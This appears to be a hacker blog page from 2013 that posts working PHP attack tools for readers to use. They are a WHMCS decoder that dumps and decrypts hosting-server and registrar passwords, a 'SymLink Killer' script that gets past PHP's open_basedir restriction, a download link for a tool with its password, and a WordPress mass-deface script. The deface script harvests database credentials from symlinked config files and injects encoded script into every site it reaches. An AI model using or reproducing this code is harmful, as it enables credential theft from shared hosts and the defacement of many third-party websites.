$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</
td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>
$value</td></tr>");
}
echo "</table><br><br></center>";
}
if($_POST['form_action'] == 2 )
{
//include($file);
$db_host=($_POST['db_host']);
$db_user****=($_POST['db_user****']);
$db_password=($_POST['db_password']);
$db_****=($_POST['db_****']);
$cc_encryption_hash=($_POST['cc_encryption_hash']);
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$user**** = $v['user****'];
$type = $v['type'];
$active = $v['active'];
$host**** = $v['host****'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Host****</td><td>$host****</td></
tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>User****</td><td>$user****</td></
tr>");
echo("<tr><td>Password</td><td>$password</td></
tr>");
echo "</table><br><br></center>";
}
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</
td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>
$value</td></tr>");
}
echo "</table><br><br></center>";
}
?><**** bgcolor="#000000">
<style>
**** { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-
ARROW-COLOR: olive; color: white;}
****area{background-color:#191919;color:red;font-
weight:bold;font-size: 12px;font-family: Tahoma; border: 1px
solid #666666;}
input{FONT-WEIGHT:normal;background-color: #191919;font-
size: 13px;font-weight:bold;color: red; font-family: Tahoma;
border: 1px solid #666666;******:17}
</style>
<center>
<font color="#FFFF6FF" size='+3'>[ ~~ WHMCS Server
Password decoder ~~ ]</font><br><br>
<font color="#0066FF" size='+2'>Symlink to
configuration.php of WHMCS</font><br>
</center>
<FORM action="" method="post">
<input type="hidden" ****="form_action" value="1">
<br>
<input type="****" size="30" ****="file" value="">
<br>
<INPUT class=submit type="submit" value="Submit"
****="Submit">
</FORM>
<hr>
<br>
<center>
<font color="#0066FF" size='+2'>DB configuration of
WHMCS</font><br>
</center>
<FORM action="" method="post">
<input type="hidden" ****="form_action" value="2">
<br>
<table border=1>
<tr><td>db_host </td><td><input type="****" size="30"
****="db_host" value="localhost"></td></tr>
<tr><td>db_user**** </td><td><input type="****"
size="30" ****="db_user****" value=""></td></tr>
<tr><td>db_password</td><td><input type="****"
size="30" ****="db_password" value=""></td></tr>
<tr><td>db_****</td><td><input type="****" size="30"
****="db_****" value=""><td></tr>
<tr><td>cc_encryption_hash</td><td><input type="****"
size="30" ****="cc_encryption_hash" value=""></td></tr>
</table>
<br>
<INPUT class=submit type="submit" value="Submit"
****="Submit">
</FORM>
<hr>
<center>
<font color="#0066FF" size='+2'>Password decoder</
font><br>
<?
if($_POST['form_action'] == 3 )
{
$password=($_POST['password']);
$cc_encryption_hash=($_POST['cc_encryption_hash']);
$password = decrypt ($password, $cc_encryption_hash);
echo("Password is ".$password);
}
?>
</center>
<FORM action="" method="post">
<input type="hidden" ****="form_action" value="3">
<br>
<table border=1>
<tr><td>Password</td><td><input type="****" size="30"
****="password" value=""></td></tr>
<tr><td>cc_encryption_hash</td><td><input type="****"
size="30" ****="cc_encryption_hash" value=""></td></tr>
</table>
<br>
<INPUT class=submit type="submit" value="Submit"
****="Submit">
</FORM>
<hr>
<center> <font color="#FFFF6FF" size='+1'>
ilyasrobert@gmail.com </font><br><br> <center>

symlink killer sript

Posted by Yas 0 comments
                               BUAT YANG BUTUH SAJA :)


<?php //is safe mod on ? start  if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")   {   $safe="<font color=red>ON</font>";  }   else {$safe="<font color=#FF0000>OFF</font>";}  echo "<font color=black>SAFE MOD IS :</font><b>$safe</b><br>";  //open safe mod end--  ?>   <?php  //disable function start  echo "<font color=black>Disable functions :</font> <b>";  if(''==($df=@ini_get('disable_functions'))){echo "<font color=black>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}  //disable function end--   /*  <?php //is safe mod on ? start  if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")   {   $safe="<font color=red>ON</font>";  }   else {$safe="<font color=#FF0000>OFF</font>";}  echo "<font color=black>SAFE MOD IS :</font><b>$safe</b><br>";  //open safe mod end--  ?>   <?php  //disable function start  echo "<font color=black>Disable functions :</font> <b>";  if(''==($df=@ini_get('disable_functions'))){echo "<font color=black>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}  //disable function end--   /*  PHP 5.2.12/5.3.1 symlink() open_basedir bypass        CHUJWAMWMUZG  */   $fakedir="cx";  $fakedep=16;   $num=0; // offset of symlink.$num   if(!empty($_GET['file'])) $file=$_GET['file'];  else if(!empty($_POST['file'])) $file=$_POST['file'];  else $file="";   echo '<div align="center"> <div align="center">  <hr> <pre class="ml1"><font color="#FF0000"> </font><font color="#333333">   </font></pre> </div> </div> <p align="center"><b><font face="Tahoma" size="7">!</font></b><font color="#FF0000" face="Tahoma" size="6"> </font><font face="Tahoma" size="6"><font color="#FF0000"><b>Sy</b></font>mLink  K<font color="#FF0000"><b>iller</b></font> 0.1</font><font color="#FF0000" face="Tahoma" size="6">  </font><b><font color="#FF0000" face="Tahoma" size="7">  !</font></b></p> <p align="center"><font color="#FF0000" face="Comic Sans MS">Symlink Bypass symlink()  open_basedir</font></p> <p align="center"><font face="Comic Sans MS"></font></p> <p align="center"><font face="Comic Sans MS">Nam3 :</font><font color="#FF0000" face="Comic Sans MS">  File Nam3 That u Want T0 Create !n And ch0sse : </font><font face="Comic Sans MS">Rum  SymL!nk</font> </p> <p><form name="form"  action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF  "]).'" method="post"> <p align="center"> <input type="text" name="file" size="50"  value="'.htmlspecialchars($file).'" style="border: 1px solid #FF0000"><input type="submit" name="hym"  value="Run Symlink" style="color: #FF0000; border: 1px solid #FF0000"></p> <p align="center"><font color="#FF0000" face="Tahoma" size="5">! </font> <font face="Tahoma">Symlink Bypass symlink() open_basedir bypass </font> <font color="#FF0000" face="Tahoma" size="5">!</font></p> <p align="center"><font size="2" face="Tahoma">From :</font><font size="2" color="#FF0000" face="Tahoma">   PHP 5.2.12/5.3.1</font></p>  <hr>   </form>';   if(empty($file))  exit;   if(!is_writable("."))  die("not writable directory");   $level=0;   for($as=0;$as<$fakedep;$as++){  if(!file_exists($fakedir))  mkdir($fakedir);  chdir($fakedir);  }   while(1<$as--) chdir("..");   $hardstyle = explode("/", $file);   for($a=0;$aa<count($hardstyle);$a++){  if(!empty($hardstyle[$a])){  if(!file_exists($hardstyle[$a]))  mkdir($hardstyle[$a]);  chdir($hardstyle[$a]);  $as++;  }  }  $as++;  while($as--)  chdir("..");   @rmdir("fakesymlink");  @unlink("fakesymlink");   @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");   // this loop will skip allready created symlinks.  while(1)  if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,  "symlink".$num))) break;  else $num++;   @unlink("fakesymlink");  mkdir("fakesymlink");   die('<FONT COLOR="RED">check symlink <a  href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');    ?>


     ENJOY IT 

Smart Hunter v.1.4.3

Posted by Yas 0 comments
Smart Hunter v.1.4.3
                    SREENSHOT :                

                                     


Video Presentation of version 1.2

 Code:
http://www.youtube.com/watch?v=vbnSBNTxXbM

 Download Smart Hunter

 Code:
http://www.mediafire.com/?4vzcbm1j7imq14d
Login Password : fuck lamers

ENJOY IT !! :)

wordpress mass deface script

Posted by Yas 0 comments

<title>Wordpress MassDeface(ReCoded By ilyas_robert)</title>
<style>
body
{
        background: #0f0e0d;
        color: #FF9933;
        padding: 0px;
}
a:link, body_alink
{
        color: #FF9933;
        text-decoration: none;
}
a:visited, body_avisited
{
        color: #FF9933;
        text-decoration: none;
}
a:hover, a:active, body_ahover
{
        color: #FFFFFF;
        text-decoration: none;
}
td, th, p, li,table
{
       
        background: #2e2b28;
        border:1px solid #524f46;
}
input
{
        border: 1px solid;
        cursor: default;
       
        overflow: hidden;
        background: #2e2b28;
        color: #ffffff;
}textarea
{
        border: 1px solid;
        cursor: default;
       
        overflow: hidden;
        background: #2e2b28;
        color: #ffffff;
}
button
{
        border: 1px solid;
        cursor: default;
       
        overflow: hidden;
        background: #2e2b28;
        color: #ffffff;
}
</style>
</head>

<body bgcolor="black">
<center>
<pre>
__          __      __  __                 _____        __              
\ \        / /     |  \/  |               |  __ \      / _|              
 \ \  /\  / / __   | \  / | __ _ ___ ___  | |  | | ___| |_ __ _  ___ ___
  \ \/  \/ / '_ \  | |\/| |/ _` / __/ __| | |  | |/ _ \  _/ _` |/ __/ _ \
   \  /\  /| |_) | | |  | | (_| \__ \__ \ | |__| |  __/ || (_| | (_|  __/
    \/  \/ | .__/  |_|  |_|\__,_|___/___/ |_____/ \___|_| \__,_|\___\___|
           | |                                                          
           |_|                                                          
</pre>
</center>
<form method="POST" action="" >
<center>
<table border='1'><tr><td>List of All Symlink</td><td>
<input type="text" name="url" size="100" value="list.txt"></td></tr>
<tr><td>Index</td><td>
<textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
<br><br><input type="Submit" name="Submit" value="Submit">
<input type="hidden" name="action" value="1"></form>
</center>
<?
set_time_limit(0);
if ($_POST['action']=='1'){
$url=$_POST['url'];
$users=@file($url);


if (count($users)<1) exit("<h1>No config found</h1>");
foreach ($users as $user) {
$user1=trim($user);
$code=file_get_contents2($user1);
preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
$db=$b1[1][0];
preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
$user=$b2[1][0];
preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
$db_password=$b3[1][0];
preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
$host=$b4[1][0];
preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
$p=$b5[1][0];


$d=@mysql_connect( $host, $user, $db_password ) ;
if ($d){
@mysql_select_db($db );
$source=stripslashes($_POST['index']);
$s2=strToHex(($source));
$s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
$ls=strlen($s)-2;
$sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
mysql_query($sql) ;
$sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
mysql_query($sql) ;
if (function_exists("mb_convert_encoding") )
{
$source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
$source2=mysql_real_escape_string($source2);
$sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
@mysql_query($sql) ; ;
$sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
@mysql_query($sql) ; ;
}
$aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
$siteurl=@mysql_fetch_array($aa) ;
$siteurl=$siteurl['option_value'];
$tr.="$siteurl\n";
mysql_close();
}
}
if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
}
function strToHex($string)
{
    $hex='';
    for ($i=0; $i < strlen($string); $i++)
    {
        if (strlen(dechex(ord($string[$i])))==1){
        $hex .="%0". dechex(ord($string[$i]));
                }
                else
                {
                $hex .="%". dechex(ord($string[$i]));
                }
    }
    return $hex;
}

function file_get_contents2($u){

        $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$u);
        curl_setopt($ch, CURLOPT_HEADER, 0);    
   curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
            $result = curl_exec($ch);
        return $result ;
        }
       
?>


SCREENSHOT :


ENJOY IT  :D

SITE INFO

Copyright © 2013 Ilyas Cyber4rt. All rights reserved.